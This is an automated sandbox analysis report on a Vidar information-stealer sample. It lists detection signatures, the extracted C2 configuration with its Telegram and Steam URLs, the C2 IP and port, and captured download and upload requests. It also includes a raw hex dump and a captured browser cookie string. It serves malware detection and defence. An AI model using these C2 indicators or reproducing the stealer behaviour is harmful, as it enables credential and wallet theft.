Windows Analysis Report
file.exe

Overview

General Information

Sample Name: file.exe
Analysis ID: 1301138
MD5: bf81661814944b92da689f1c461ef908
SHA1: 7e3235d7ce69217063f53840e6337633cc721ec7
SHA256: a524fce6eb4ee25ed07de294220d9c2445090b6c18b48802219149162152fea1
Tags: exe
Infos:

Detection

Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Yara detected Vidar stealer
Detected unpacking (changes PE section rights)
Tries to steal Crypto Currency Wallets
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Uses known network protocols on non-standard ports
Searches for specific processes (likely to inject)
Machine Learning detection for sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
PE file contains sections with non-standard names
Detected potential crypto function
Found potential string decryption / allocating functions
Found evasive API chain (may stop execution after checking a module file name)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Queries information about the installed CPU (vendor, model number etc)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Uses Microsoft's Enhanced Cryptographic Provider

Classification

AV Detection
barindex
Found malware configuration
Source: 00000001.00000002.3698889782.0000000004100000.00000040.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199545993403", "https://t.me/vogogor"], "Botnet": "b2ced91faf30889899f34458f95b8e93", "Version": "5.4"}
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 65%
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_004158A0 CryptUnprotectData,LocalAlloc,_memmove,LocalFree, 1_2_004158A0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0040AA30 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,_memset,CryptBinaryToStringA, 1_2_0040AA30
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00415600 _memset,lstrlen,CryptStringToBinaryA,_memmove,lstrcat,lstrcat, 1_2_00415600
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00415820 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 1_2_00415820

Compliance
barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 1.2.file.exe.400000.0.unpack
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.8:49773 version: TLS 1.2
Source: Binary string: freebl3.pdb source: file.exe, 00000001.00000002.3729241460.0000000010A10000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.1.dr
Source: Binary string: mozglue.pdbP source: mozglue.dll.1.dr
Source: Binary string: freebl3.pdbp source: file.exe, 00000001.00000002.3729241460.0000000010A10000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.1.dr
Source: Binary string: nss3.pdb@ source: nss3.dll.1.dr
Source: Binary string: C:\lesuzu\bicavujepoc rikuwevokociku_bonotalehimuk pikajune\xo.pdb source: file.exe
Source: Binary string: softokn3.pdb@ source: softokn3.dll.1.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.1.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.1.dr
Source: Binary string: 1C:\lesuzu\bicavujepoc rikuwevokociku_bonotalehimuk pikajune\xo.pdb source: file.exe
Source: Binary string: nss3.pdb source: nss3.dll.1.dr
Source: Binary string: mozglue.pdb source: mozglue.dll.1.dr
Source: Binary string: softokn3.pdb source: softokn3.dll.1.dr
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00412170 _memset,lstrcat,wsprintfA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 1_2_00412170
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_004171C0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,_memset,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA, 1_2_004171C0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00412450 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 1_2_00412450
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00412690 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,StrCmpCA,wsprintfA,PathMatchSpecA,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,_memset,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 1_2_00412690
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0041B7E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,wsprintfA,_memset,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 1_2_0041B7E0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0040C8E0 wsprintfA,FindFirstFileA,_memset,lstrcat,StrCmpCA,StrCmpCA,lstrcpy,lstrcat,lstrcat,_memset,_memset,StrCmpCA,wsprintfA,wsprintfA,lstrlen,_strtok_s,PathMatchSpecA,CoInitialize,_strtok_s,PathMatchSpecA,lstrcpy,lstrcat,PathFindFileNameA,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileA,FindClose,PathMatchSpecA,lstrcpy,lstrcat,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,CoInitialize,PathMatchSpecA,lstrcpy,lstrcat,PathFindFileNameA,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,lstrcpy,lstrcat,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, 1_2_0040C8E0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00424960 FindFirstFileW,FindNextFileW,FindNextFileW, 1_2_00424960
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_004169A0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 1_2_004169A0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0040AAC0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 1_2_0040AAC0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00416BB0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_00416BB0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0040DE60 _memset,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetLogicalDriveStringsA,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen, 1_2_0040DE60
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior

Networking
barindex
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49774 -> 6012
Source: unknown Network traffic detected: HTTP traffic on port 6012 -> 49774
Source: unknown Network traffic detected: HTTP traffic on port 49774 -> 6012
Source: unknown Network traffic detected: HTTP traffic on port 6012 -> 49774
Source: unknown Network traffic detected: HTTP traffic on port 49774 -> 6012
Source: unknown Network traffic detected: HTTP traffic on port 6012 -> 49774
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://steamcommunity.com/profiles/76561199545993403
Source: Malware configuration extractor URLs: https://t.me/vogogor
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 149.154.167.99 149.154.167.99
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /vogogor HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.me
Source: global traffic HTTP traffic detected: GET /b2ced91faf30889899f34458f95b8e93 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.2.13 (KHTML, like Gecko) Version/16.5.2 Safari/605.2.13Host: 195.201.254.123:6012
Source: global traffic HTTP traffic detected: GET /sp1.zip HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.2.13 (KHTML, like Gecko) Version/16.5.2 Safari/605.2.13Host: 195.201.254.123:6012Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----4389493767942367User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.2.13 (KHTML, like Gecko) Version/16.5.2 Safari/605.2.13Host: 195.201.254.123:6012Content-Length: 126637Connection: Keep-AliveCache-Control: no-cache
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.8:49774 -> 195.201.254.123:6012
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown Network traffic detected: HTTP traffic on port 49773 -> 443
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 31 Aug 2023 14:50:49 GMTContent-Type: application/zipContent-Length: 2685679Last-Modified: Mon, 12 Sep 2022 13:14:59 GMTConnection: keep-aliveETag: "631f30d3-28faef"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 24 56 25 55 2b 6d 5c 08 39 7c 05 00 50 75 0a 00 0b 00 00 00 66 72 65 65 62 6c 33 2e 64 6c 6c ec bd 0f 5c 54 e7 95 37 3e 97 19 61 d0 89 77 28 34 21 29 55 48 68 ab ad 4d e7 3a a6 91 48 13 8c 0c 90 c4 31 18 1c 35 bb 4e 62 ba d6 f5 75 f3 26 46 99 c4 76 33 2d 64 20 ce e3 75 5a 92 d5 d6 6e b5 75 df b2 5d f7 7d e9 bb b4 ab c4 b4 da cc 80 85 11 29 0c 4a 61 50 aa 24 a1 66 28 6c 3b 40 2a ff 52 e6 77 ce 79 ee 9d 19 40 52 b3 bf ee 2f ed ef b3 f9 44 e6 fe 7d 9e f3 9c e7 fc f9 9e f3 fc b9 d6 bf da ab 11 34 1a 8d 4e 33 fd bf 3c cd 1f ff 6f 2f fc 5b b8 f8 27 0b 35 27 92 7f 91 75 4a 58 fb 8b ac 0d 3b fe c7 9e cc 5d bb 9f fd db dd 4f fd cf cc bf 79 ea 99 67 9e 2d cd fc e2 97 32 77 3b 9e c9 fc 1f cf 64 e6 3f 5a 92 f9 3f 9f dd f6 a5 bb b3 35 9a 62 8b 46 b3 56 48 d4 8c ac f8 c8 df a8 e5 f5 6a ee cc 5a 20 2c 84 42 f5 1a cd 8a 04 ba b6 eb 23 70 6c 8c 56 69 a4 63 b8 95 48 54 c7 7e 35 81 f9 d4 88 f3 7f 98 0f b7 f3 56 d3 4b 46 fe 0a ff e5 3f 45 19 f3 35 25 f0 fb 1d f8 f5 e3 c5 aa f9 9a bd da b8 46 15 cc d7 14 7f 0e 7e 8f cd d7 84 ef d2 68 0e de 3a 5f 93 a1 99 fb 3f 7d a6 5e 73 2c ee bc 7a d1 7c 4d 9e 30 f7 f3 77 97 7e 69 6f 29 fc 1e 32 28 ed 5a a8 9f c5 fc 4c 8d 66 eb dd bb b7 3d 55 fa 94 46 73 36 11 1a 0b 75 68 f4 f0 8b bc 98 de 47 79 77 f3 c7 34 b9 05 f0 c7 34 9f 78 a3 b9 63 fe cc e7 bc 77 9b 4c 7f b3 fd 6f 95 aa ca 94 e7 32 66 3d 97 77 f7 ee 3d bb b1 43 88 27 55 9c a7 9a 45 37 7a ee 4b 4f 3f fb 37 1a e2 11 f2 4a 03 7d aa b9 73 d6 73 0f 6a fe fb bf 3f eb ff 6c ec d7 3b 1e 05 79 0d 0d 2f d0 6b 5c 67 75 95 de d2 85 ac 6c 25 5c 71 79 45 57 6f d8 de b0 23 b5 37 12 09 35 f1 db 92 d7 de d0 12 ff 1f bc bf 69 a3 6c d1 c3 7b 8b 64 47 86 ec 4c 93 6d 46 d9 6a a8 8c 94 de 39 2c 1a 93 86 c5 94 32 13 94 36 b0 64 c7 3c 2c e7 6b bc 9c 53 11 f8 6f e0 93 4d 65 2b e0 de 0f e0 bf a6 32 93 72 b4 d3 b8 71 a7 66 a7 e6 b1 f5 c5 a1 07 be 99 08 0f 67 3c f1 a4 bd 21 ae be 92 4d 1b 39 c9 0f 44 49 36 b1 26 85 e8 26 51 ba ee 7a 27 5c fa 77 b2 85 28 b1 1b 64 ab be f2 72 e9 62 20 46 0b c4 ec 23 62 3e c1 1b 35 3c 9f 37 ea fa 40 6e d3 be 28 25 fb 62 94 3c 86 94 14 af df 14 3a 79 88 28 81 aa 8c 91 d7 b0 a2 50 35 7f 77 20 81 4d b1 f0 13 4f fe b5 bd 21 8e 1f 0e 7d e5 f5 d2 4c d9 69 d8 a9 d9 18 7a fd 1f f1 5d 3d 70 64 61 a4 8e de dd c1 df c5 76 f1 f6 b8 fa c6 5c 83 c5 6c 6d f6 32 d9 9a fe 4f 27 4c f3 8d 52 88 e5 67 17 35 e5 67 af 40 23 e1 1a 37 ee be 9d f9 5d bd 49 8e 8f 78 be ac 5f e5 34 3e 9f b6 43 0b 4d e8 ff 31 e8 f1 0e 1d 1e 1d 87 23 d7 8b d9 cb 34 62 c5 61 3c 74 ea e1 e8 eb 70 24 3b d2 2a af 8b 15 2e 38 64 17 d9 98 ab 77 ac 38 d4 9a ac b0 4e ac d8 8b d7 5f cc ce 54 18 94 9f bd 92 d5 bb ea f5 50 7d b6 ec 4c df e4 fb 9d 76 e3 63 a1 27 80 62 79 6d b6 c9 75 d6 30 7a 15 9e 36 49 5e a0 8d 0c 23 fc a6 2b bf 69 ca af 51 f9 35 28 bf
Source: unknown TCP traffic detected without corresponding DNS query: 195.201.254.123
Source: unknown TCP traffic detected without corresponding DNS query: 195.201.254.123
Source: unknown TCP traffic detected without corresponding DNS query: 195.201.254.123
Source: unknown TCP traffic detected without corresponding DNS query: 195.201.254.123
Source: unknown TCP traffic detected without corresponding DNS query: 195.201.254.123
Source: unknown TCP traffic detected without corresponding DNS query: 195.201.254.123
Source: unknown TCP traffic detected without corresponding DNS query: 195.201.254.123
Source: unknown TCP traffic detected without corresponding DNS query: 195.201.254.123
Source: unknown TCP traffic detected without corresponding DNS query: 195.201.254.123
Source: unknown TCP traffic detected without corresponding DNS query: 195.201.254.123
Source: unknown TCP traffic detected without corresponding DNS query: 195.201.254.123
Source: unknown TCP traffic detected without corresponding DNS query: 195.201.254.123
Source: unknown TCP traffic detected without corresponding DNS query: 195.201.254.123
Source: unknown TCP traffic detected without corresponding DNS query: 195.201.254.123
Source: unknown TCP traffic detected without corresponding DNS query: 195.201.254.123
Source: unknown TCP traffic detected without corresponding DNS query: 195.201.254.123
Source: unknown TCP traffic detected without corresponding DNS query: 195.201.254.123
Source: unknown TCP traffic detected without corresponding DNS query: 195.201.254.123
Source: unknown TCP traffic detected without corresponding DNS query: 195.201.254.123
Source: unknown TCP traffic detected without corresponding DNS query: 195.201.254.123
Source: unknown TCP traffic detected without corresponding DNS query: 195.201.254.123
Source: unknown TCP traffic detected without corresponding DNS query: 195.201.254.123
Source: unknown TCP traffic detected without corresponding DNS query: 195.201.254.123
Source: unknown TCP traffic detected without corresponding DNS query: 195.201.254.123
Source: unknown TCP traffic detected without corresponding DNS query: 195.201.254.123
Source: unknown TCP traffic detected without corresponding DNS query: 195.201.254.123
Source: unknown TCP traffic detected without corresponding DNS query: 195.201.254.123
Source: unknown TCP traffic detected without corresponding DNS query: 195.201.254.123
Source: unknown TCP traffic detected without corresponding DNS query: 195.201.254.123
Source: unknown TCP traffic detected without corresponding DNS query: 195.201.254.123
Source: unknown TCP traffic detected without corresponding DNS query: 195.201.254.123
Source: unknown TCP traffic detected without corresponding DNS query: 195.201.254.123
Source: unknown TCP traffic detected without corresponding DNS query: 195.201.254.123
Source: unknown TCP traffic detected without corresponding DNS query: 195.201.254.123
Source: unknown TCP traffic detected without corresponding DNS query: 195.201.254.123
Source: unknown TCP traffic detected without corresponding DNS query: 195.201.254.123
Source: unknown TCP traffic detected without corresponding DNS query: 195.201.254.123
Source: unknown TCP traffic detected without corresponding DNS query: 195.201.254.123
Source: unknown TCP traffic detected without corresponding DNS query: 195.201.254.123
Source: unknown TCP traffic detected without corresponding DNS query: 195.201.254.123
Source: unknown TCP traffic detected without corresponding DNS query: 195.201.254.123
Source: unknown TCP traffic detected without corresponding DNS query: 195.201.254.123
Source: unknown TCP traffic detected without corresponding DNS query: 195.201.254.123
Source: unknown TCP traffic detected without corresponding DNS query: 195.201.254.123
Source: unknown TCP traffic detected without corresponding DNS query: 195.201.254.123
Source: unknown TCP traffic detected without corresponding DNS query: 195.201.254.123
Source: unknown TCP traffic detected without corresponding DNS query: 195.201.254.123
Source: unknown TCP traffic detected without corresponding DNS query: 195.201.254.123
Source: unknown TCP traffic detected without corresponding DNS query: 195.201.254.123
Source: unknown TCP traffic detected without corresponding DNS query: 195.201.254.123
Source: file.exe, 00000001.00000002.3729883026.0000000011376000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: .www.linkedin.comFALSE/FALSE1712164711bscookie"v=1&202204040740589e4e0288-8f83-439a-84f5-073fd989928dAQH-qUSHAeATZCYYPWnORXttTduQBnCi" equals www.linkedin.com (Linkedin)
Source: 98279768849475661070206458.1.dr String found in binary or memory: .www.linkedin.combscookie/0 equals www.linkedin.com (Linkedin)
Source: 98279768849475661070206458.1.dr String found in binary or memory: w.www.linkedin.combscookiev10 equals www.linkedin.com (Linkedin)
Source: file.exe, 00000001.00000002.3698626677.0000000002606000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://195.201.254.123:6012/
Source: file.exe, 00000001.00000002.3698626677.0000000002606000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://195.201.254.123:6012/0
Source: file.exe, 00000001.00000002.3701045776.00000000043F6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://195.201.254.123:6012/Mu
Source: file.exe, 00000001.00000002.3707864447.0000000004670000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://195.201.254.123:6012/b2ced91faf30889899f34458f95b8e93
Source: file.exe, 00000001.00000002.3707864447.0000000004670000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://195.201.254.123:6012/b2ced91faf30889899f34458f95b8e93k
Source: file.exe, 00000001.00000002.3698626677.0000000002606000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://195.201.254.123:6012/m
Source: file.exe, 00000001.00000002.3723888260.0000000004C90000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://195.201.254.123:6012/sCodecs.dlls
Source: file.exe, 00000001.00000002.3698626677.00000000025E1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://195.201.254.123:6012/sp1.zip
Source: file.exe, 00000001.00000002.3698626677.00000000025E1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://195.201.254.123:6012/sp1.zipn)
Source: file.exe, 00000001.00000002.3729241460.0000000010A10000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: file.exe, 00000001.00000002.3729241460.0000000010A10000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: file.exe, 00000001.00000002.3729241460.0000000010A10000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: file.exe, 00000001.00000002.3729241460.0000000010A10000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: file.exe, 00000001.00000002.3729241460.0000000010A10000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: file.exe, 00000001.00000002.3701045776.00000000043F6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: file.exe, 00000001.00000002.3729241460.0000000010A10000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: file.exe, 00000001.00000002.3729241460.0000000010A10000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: file.exe, 00000001.00000002.3729241460.0000000010A10000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000001.00000002.3729241460.0000000010A10000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: file.exe, 00000001.00000002.3729241460.0000000010A10000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: file.exe, 00000001.00000002.3729241460.0000000010A10000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: file.exe, 00000001.00000002.3729241460.0000000010A10000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: file.exe, 00000001.00000002.3729241460.0000000010A10000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000001.00000002.3729241460.0000000010A10000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: file.exe, 00000001.00000002.3729241460.0000000010A10000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000001.00000002.3729241460.0000000010A10000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: file.exe, 00000001.00000002.3729241460.0000000010A10000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: file.exe, 00000001.00000002.3729241460.0000000010A10000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: file.exe, 00000001.00000002.3729241460.0000000010A10000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: file.exe, 00000001.00000002.3729241460.0000000010A10000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: mozglue.dll.1.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000001.00000002.3730836231.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000002.3729067726.00000000108F7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: 60379239670748708072323449.1.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 30562671907380543272507388.1.dr, 05817041688375942296226764.1.dr String found in binary or memory: https://aka.ms/vs/17/release/vc_redist.x64.exeD
Source: 60379239670748708072323449.1.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 30562671907380543272507388.1.dr, 05817041688375942296226764.1.dr String found in binary or memory: https://cdn.stubdownloader.services.mozilla.com/builds/firefox-stub/en-US/win/4b14f052f39ceffb32abd8
Source: 00440746450577075373182215.1.dr, 37707990510604932654966133.1.dr, 60379239670748708072323449.1.dr, 59242670612831660624168672.1.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 00440746450577075373182215.1.dr, 37707990510604932654966133.1.dr, 60379239670748708072323449.1.dr, 59242670612831660624168672.1.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 38345013959471306846242542.1.dr, 93702365600485792059963927.1.dr String found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7B27E81B29
Source: 30562671907380543272507388.1.dr, 05817041688375942296226764.1.dr String found in binary or memory: https://download.mozilla.org/?product=firefox-stub&os=win&lang=en-US&attribution_code=c291cmNlPXd3dy
